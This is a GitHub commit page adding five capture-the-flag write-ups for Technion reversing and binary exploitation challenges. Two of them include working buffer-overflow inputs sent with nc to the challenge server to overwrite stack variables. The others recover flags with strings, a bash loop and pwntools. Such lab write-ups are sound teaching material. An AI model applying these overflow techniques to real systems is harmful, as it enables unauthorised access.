forked from Dvd848/CTFs
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
5 changed files
with
280 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,62 @@ | ||
| # Faculta Necshevet Identifier | ||
| Category: Reversing & Binary Exploitation | ||
|
|
||
| ## Description | ||
| > DuckyDebugDuck decided to continue development on his "Faculta Necshevet Identifier" from the initial challenge and finally finished the first version, he told us that if you're from a "Faculta Necshevet" then you'll get a flag! | ||
| A binary file was attached. | ||
|
|
||
| ## Solution | ||
|
|
||
| Let's run the attached file: | ||
|
|
||
| ```console | ||
| root@kali:/media/sf_CTFs/technion/Faculta_Necshevet_Identifier# ./facultaNecshevetIdentifier | ||
| My name is DuckyDebugDuck, what's yours? test | ||
| Hi test, checking... | ||
| You're not from a faculta necshevet, you won't get the flag | ||
| ``` | ||
|
|
||
| We must enter the correct name in order to be identified as worthy to get the flag. | ||
|
|
||
| Let's check the decompilation with Ghidra: | ||
|
|
||
| ```c | ||
| undefined8 main(void) | ||
|
|
||
| { | ||
| undefined user_input [60]; | ||
| int is_auth; | ||
|
|
||
| is_auth = 0; | ||
| printf("My name is DuckyDebugDuck, what\'s yours? "); | ||
| __isoc99_scanf(&DAT_00102032,user_input); | ||
| printf("Hi %s, checking...\n",user_input); | ||
| if (is_auth == 0) { | ||
| puts("You\'re not from a faculta necshevet, you won\'t get the flag"); | ||
| } | ||
| else { | ||
| puts("YOU\'RE FROM A FACULTA NECHSEVET, here\'s the flag: ##############"); | ||
| } | ||
| return 0; | ||
| } | ||
| ``` | ||
| We can see that the user input is read into a 60 byte buffer. However, the length of the input read from the user isn't limited to 60: | ||
| ```assembly | ||
| DAT_00102032 XREF[1]: main:001011b4(*) | ||
| 00102032 25 ?? 25h % | ||
| 00102033 73 ?? 73h s | ||
| 00102034 00 ?? 00h | ||
| ``` | ||
|
|
||
| Therefore, we can enter a string of any length and override other stack members, such as `is_auth`. If we override `is_auth` with any value other than 0, we will get the flag. | ||
|
|
||
| In order to override `is_auth`, we'll send a name of length 64 - 60 characters to fill up the `user_input` buffer and four more to reach `is_auth` and change its boolean value to "true": | ||
|
|
||
|
|
||
| ```console | ||
| root@kali:/media/sf_CTFs/technion/Faculta_Necshevet_Identifier# python -c "print('a'*64)" | nc ctf.cs.technion.ac.il 4005 | ||
| My name is DuckyDebugDuck, what's yours? Hi aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, checking... | ||
| YOU'RE FROM A FACULTA NECHSEVET, here's the flag: cstechnion{kn0w_th3_l1m1ts_4nd_br34k_th3m} | ||
| ``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,63 @@ | ||
| # Faculta Necshevet Identifier v2 | ||
| Category: Reversing & Binary Exploitation | ||
|
|
||
| ## Description | ||
| > After the failure of the previous version, DuckyDebugDuck created a new version which he says is "quack-proof", and even hid a new flag in it! | ||
| A binary file was attached. | ||
|
|
||
| ## Solution | ||
|
|
||
| Let's run the attached file: | ||
|
|
||
| ```console | ||
| root@kali:/media/sf_CTFs/technion/Faculta_Necshevet_Identifier_v2# ./facultaNecshevetIdentifier | ||
| My name is DuckyDebugDuck, what's yours? test | ||
| Hi test, checking... | ||
| You're not from a faculta necshevet, you won't get the flag | ||
| ``` | ||
|
|
||
| Just like in the [previous challenge](Faculta_Necshevet_Identifier.md), we must enter the correct name in order to be identified as worthy to get the flag. | ||
|
|
||
| Let's check the decompilation with Ghidra: | ||
|
|
||
| ```c | ||
| undefined8 main(void) | ||
|
|
||
| { | ||
| int is_equal; | ||
| char user_input [59]; | ||
| char expected_name [5]; | ||
|
|
||
| expected_name._0_4_ = 0x45455754; | ||
| expected_name[4] = 'T'; | ||
| printf("My name is DuckyDebugDuck, what\'s yours? "); | ||
| __isoc99_scanf(&DAT_00102032,user_input); | ||
| printf("Hi %s, checking...\n",user_input); | ||
| is_equal = strcmp(expected_name,"QUACK"); | ||
| if (is_equal == 0) { | ||
| puts("YOU\'RE FROM A FACULTA NECHSEVET, here\'s the flag: ###############"); | ||
| } | ||
| else { | ||
| puts("You\'re not from a faculta necshevet, you won\'t get the flag"); | ||
| } | ||
| return 0; | ||
| } | ||
| ``` | ||
| Again, the program does not limit the user input, allowing us to override variables on the stack: | ||
| ```assembly | ||
| DAT_00102032 XREF[1]: main:001011d8(*) | ||
| 00102032 25 ?? 25h % | ||
| 00102033 73 ?? 73h s | ||
| 00102034 00 ?? 00h | ||
| ``` | ||
|
|
||
| We need to override `expected_name`, which starts with a value of `TWEET` and needs to be `QUACK` in order for us to read the flag. So, what we'll do is send 59 filler characters to fill up `user_input`, followed by a `QUACK` to override and re-populate `expected_name`: | ||
|
|
||
| ```console | ||
| root@kali:/media/sf_CTFs/technion/Faculta_Necshevet_Identifier_v2# python -c "print('a'*59 + b'QUACK')" | nc ctf.cs.technion.ac.il 4006 | ||
| My name is DuckyDebugDuck, what's yours? Hi aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaQUACK, checking... | ||
| YOU'RE FROM A FACULTA NECHSEVET, here's the flag: cstechnion{qu4ck_0v3rfl0w} | ||
| ``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,62 @@ | ||
| # ZigZag | ||
| Category: Reversing & Binary Exploitation | ||
|
|
||
| ## Description | ||
| > Some binaries are zigzag | ||
|
|
||
| A binary file was attached. | ||
|
|
||
| ## Solution | ||
|
|
||
| Let's run `strings` on the file: | ||
|
|
||
| ```console | ||
| root@kali:/media/sf_CTFs/technion/ZigZag# strings ./zigzag | head -n 40 | ||
| /lib64/ld-linux-x86-64.so.2 | ||
| libc.so.6 | ||
| __cxa_finalize | ||
| __libc_start_main | ||
| GLIBC_2.2.5 | ||
| _ITM_deregisterTMCloneTable | ||
| __gmon_start__ | ||
| _ITM_registerTMCloneTable | ||
| u+UH | ||
| []A\A]A^A_ | ||
| c############ | ||
| #s########### | ||
| ##t########## | ||
| ###e######### | ||
| ####c######## | ||
| #####h####### | ||
| ######n###### | ||
| ########i#### | ||
| #########o### | ||
| ##########n## | ||
| ############{ | ||
| ###########4# | ||
| ##########d## | ||
| #########V### | ||
| ########3#### | ||
| #######n##### | ||
| ######c###### | ||
| #####3####### | ||
| ####d######## | ||
| ###_######### | ||
| ##s########## | ||
| #7########### | ||
| r############ | ||
| #i########### | ||
| ##N########## | ||
| ###g######### | ||
| ####s######## | ||
| :*3$" | ||
| GCC: (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0 | ||
| crtstuff.c | ||
| ``` | ||
|
|
||
| Let's print the string with a bash snippet: | ||
| ```console | ||
| root@kali:/media/sf_CTFs/technion/ZigZag# strings ./zigzag | grep "#" | while read line; do for (( i=0; i<${#line}; i++ )); do char=${line:$i:1}; if [ "$char" != "#" ]; then echo -n "$char"; fi; done; done && echo "}" | ||
| cstechnion{4dV3nc3d_s7riNgs} | ||
| ``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,77 @@ | ||
| # babyrev | ||
| Category: Reversing & Binary Exploitation | ||
|
|
||
| ## Description | ||
| > Another brick in the wall | ||
| A binary file was attached. | ||
|
|
||
| ## Solution | ||
|
|
||
| Let's run the binary: | ||
|
|
||
| ```console | ||
| root@kali:/media/sf_CTFs/technion/babyrev# ./babyrev | ||
| Enter Flag: test | ||
| This is not the flag... | ||
| ``` | ||
|
|
||
| The program is requesting the flag. Let's try to discover how it knows what the correct flag is. | ||
|
|
||
| We'll open the binary with Ghidra: | ||
|
|
||
| ```c | ||
| undefined8 main(void) | ||
|
|
||
| { | ||
| long lVar1; | ||
| long in_FS_OFFSET; | ||
| int i; | ||
| char user_input [27]; | ||
| char expected_pass [27]; | ||
|
|
||
| lVar1 = *(long *)(in_FS_OFFSET + 0x28); | ||
| printf("Enter Flag: "); | ||
| user_input._0_8_ = 0; | ||
| user_input._8_8_ = 0; | ||
| user_input._16_8_ = 0; | ||
| user_input._24_2_ = 0; | ||
| user_input[26] = '\0'; | ||
| expected_pass._0_8_ = 0; | ||
| expected_pass._8_8_ = 0; | ||
| expected_pass._16_8_ = 0; | ||
| expected_pass._24_2_ = 0; | ||
| expected_pass[26] = '\0'; | ||
| __isoc99_scanf(&DAT_00102015,user_input); | ||
| expected_pass._0_8_ = 0x696e686365747363; | ||
| expected_pass._8_8_ = 0x745f57306e7b6e6f; | ||
| expected_pass._16_8_ = 0x525f73695f733148; | ||
| expected_pass._24_2_ = 0x7633; | ||
| expected_pass[26] = '}'; | ||
| i = 0; | ||
| do { | ||
| if (26 < i) { | ||
| puts("Good job! now go ahead and submit it"); | ||
| LAB_001012ec: | ||
| if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) { | ||
| /* WARNING: Subroutine does not return */ | ||
| __stack_chk_fail(); | ||
| } | ||
| return 0; | ||
| } | ||
| if (expected_pass[i] != user_input[i]) { | ||
| puts("This is not the flag..."); | ||
| goto LAB_001012ec; | ||
| } | ||
| i = i + 1; | ||
| } while( true ); | ||
| } | ||
| ``` | ||
| This is a very simple program. The expected password is initialized and compared character by character to the user input. We can easily extract the password from the binary: | ||
| ```python | ||
| >>> from pwn import * | ||
| >>> p64(0x696e686365747363) + p64(0x745f57306e7b6e6f) + p64(0x525f73695f733148) + p16(0x7633) + b'}' | ||
| b'cstechnion{n0W_tH1s_is_R3v}' | ||
| ``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,16 @@ | ||
| # strings it | ||
| Category: Reversing & Binary Exploitation | ||
|
|
||
| ## Description | ||
| > I think you know what to do. | ||
| A binary file was attached. | ||
|
|
||
| ## Solution | ||
|
|
||
| Should we even run it? Nah... | ||
|
|
||
| ```console | ||
| root@kali:/media/sf_CTFs/technion/strings_it# strings strings_it | grep cstechnion | ||
| cstechnion{w3lc0Me_t0_rEv} | ||
| ``` |